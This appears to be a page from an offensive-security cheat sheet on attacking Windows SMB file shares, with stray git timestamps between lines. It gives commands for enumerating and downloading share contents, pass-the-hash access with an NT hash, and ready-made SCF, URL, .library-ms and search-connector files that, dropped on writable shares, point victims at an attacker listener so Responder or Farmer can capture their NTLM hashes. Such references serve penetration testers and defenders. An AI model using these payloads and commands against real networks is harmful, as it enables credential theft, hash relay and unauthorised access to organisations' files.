2023-12-03 13:44:59 +00:00
# Internal - Shares
2023-12-03 11:17:02 +00:00
## READ Permission
> Some shares can be accessible without authentication, explore them to find some juicy files
2024-07-17 09:02:59 +00:00
* [Pennyw0rth/NetExec ](https://github.com/Pennyw0rth/NetExec ) - The Network Execution Tool
```ps1
nxc smb 10.0.0.4 -u guest -p '' -M spider_plus
nxc smb 10.0.0.4 -u guest -p '' --get-file \\info.txt.txt infos.txt.txt --share OPENSHARE
```
* [ShawnDEvans/smbmap ](https://github.com/ShawnDEvans/smbmap ) - a handy SMB enumeration tool
2023-12-03 11:17:02 +00:00
```powershell
smbmap -H 10.10.10.10 # null session
2023-12-14 14:11:54 +00:00
smbmap -H 10.10.10.10 -r PATH # recursive listing
2023-12-03 11:17:02 +00:00
smbmap -H 10.10.10.10 -u invaliduser # guest smb session
smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
```
2024-07-17 09:02:59 +00:00
* [byt3bl33d3r/pth-smbclient ](https://github.com/byt3bl33d3r/pth-toolkit ) from path-toolkit
2023-12-03 11:17:02 +00:00
```powershell
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
ls # list files
cd # move inside a folder
get # download files
put # replace a file
```
2024-07-17 09:02:59 +00:00
* [SecureAuthCorp/smbclient ](https://github.com/SecureAuthCorp/impacket ) from Impacket
2023-12-03 11:17:02 +00:00
```powershell
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
use Sharename # select a Sharename
cd Folder # move inside a folder
ls # list files
```
2024-07-17 09:02:59 +00:00
* [smbclient ](# ) - from Samba, ftp-like client to access SMB/CIFS resources on servers
2023-12-03 11:17:02 +00:00
```powershell
smbclient -U username //10.0.0.1/SYSVOL
smbclient //10.0.0.1/Share
# Download a folder recursively
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd '/path/to/go/'
smb: \> mget *
```
2024-07-17 09:02:59 +00:00
* [SnaffCon/Snaffler ](https://github.com/SnaffCon/Snaffler ) - a tool for pentesters to help find delicious candy
2023-12-03 11:17:02 +00:00
```ps1
snaffler.exe -s - snaffler.log
# Snaffle all the computers in the domain
./Snaffler.exe -d domain.local -c < DC > -s
# Snaffle specific computers
./Snaffler.exe -n computer1,computer2 -s
# Snaffle a specific directory
./Snaffler.exe -i C:\ -s
```
## WRITE Permission
Write SCF and URL files on a writeable share to farm for user's hashes and eventually replay them.
Theses attacks can be automated with [Farmer.exe ](https://github.com/mdsecactivebreach/Farmer ) and [Crop.exe ](https://github.com/mdsecactivebreach/Farmer/tree/main/crop )
```ps1
# Farmer to receive auth
farmer.exe < port > [seconds] [output]
farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
farmer.exe 8888 60 # one minute
# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks
crop.exe < output folder > < output filename > < WebDAV server > < LNK value > [options]
Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico
Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec
```
### SCF Files
Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
```powershell
[Shell]
Command=2
IconFile=\\10.10.10.10\Share\test.ico
[Taskbar]
Command=ToggleDesktop
```
2024-03-29 21:24:52 +00:00
Using [`netexec` ](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/slinky.py ):
2023-12-03 11:17:02 +00:00
```ps1
2024-03-29 21:24:52 +00:00
netexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf
netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk
netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP
2023-12-03 11:17:02 +00:00
```
### URL Files
This attack also works with `.url` files and `responder -I eth0 -v` .
```powershell
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.10.10.10\%USERNAME%.icon
IconIndex=1
```
### Windows Library Files
> Windows Library Files (.library-ms)
```xml
<?xml version="1.0" encoding="UTF-8"?>
< libraryDescription xmlns = "<http://schemas.microsoft.com/windows/2009/library>" >
< name > @windows.storage.dll,-34582< / name >
< version > 6< / version >
< isLibraryPinned > true< / isLibraryPinned >
< iconReference > imageres.dll,-1003< / iconReference >
< templateInfo >
< folderType > {7d49d726-3c21-4f05-99aa-fdc2c9474656}< / folderType >
< / templateInfo >
< searchConnectorDescriptionList >
< searchConnectorDescription >
< isDefaultSaveLocation > true< / isDefaultSaveLocation >
< isSupported > false< / isSupported >
< simpleLocation >
< url > \\\\workstation@8888\\folder</ url >
< / simpleLocation >
< / searchConnectorDescription >
< / searchConnectorDescriptionList >
< / libraryDescription >
```
### Windows Search Connectors Files
> Windows Search Connectors (.searchConnector-ms)
```xml
<?xml version="1.0" encoding="UTF-8"?>
< searchConnectorDescription xmlns = "<http://schemas.microsoft.com/windows/2009/searchConnector>" >
< iconReference > imageres.dll,-1002< / iconReference >
< description > Microsoft Outlook< / description >
< isSearchOnlyItem > false< / isSearchOnlyItem >
< includeInStartMenuScope > true< / includeInStartMenuScope >
< iconReference > \\\\workstation@8888\\folder.ico</ iconReference >
< templateInfo >
< folderType > {91475FE5-586B-4EBA-8D75-D17434B8CDF6}< / folderType >
< / templateInfo >
< simpleLocation >
< url > \\\\workstation@8888\\folder</ url >
< / simpleLocation >
< / searchConnectorDescription >
2023-12-03 21:54:23 +00:00
```
## References
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX ](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/ )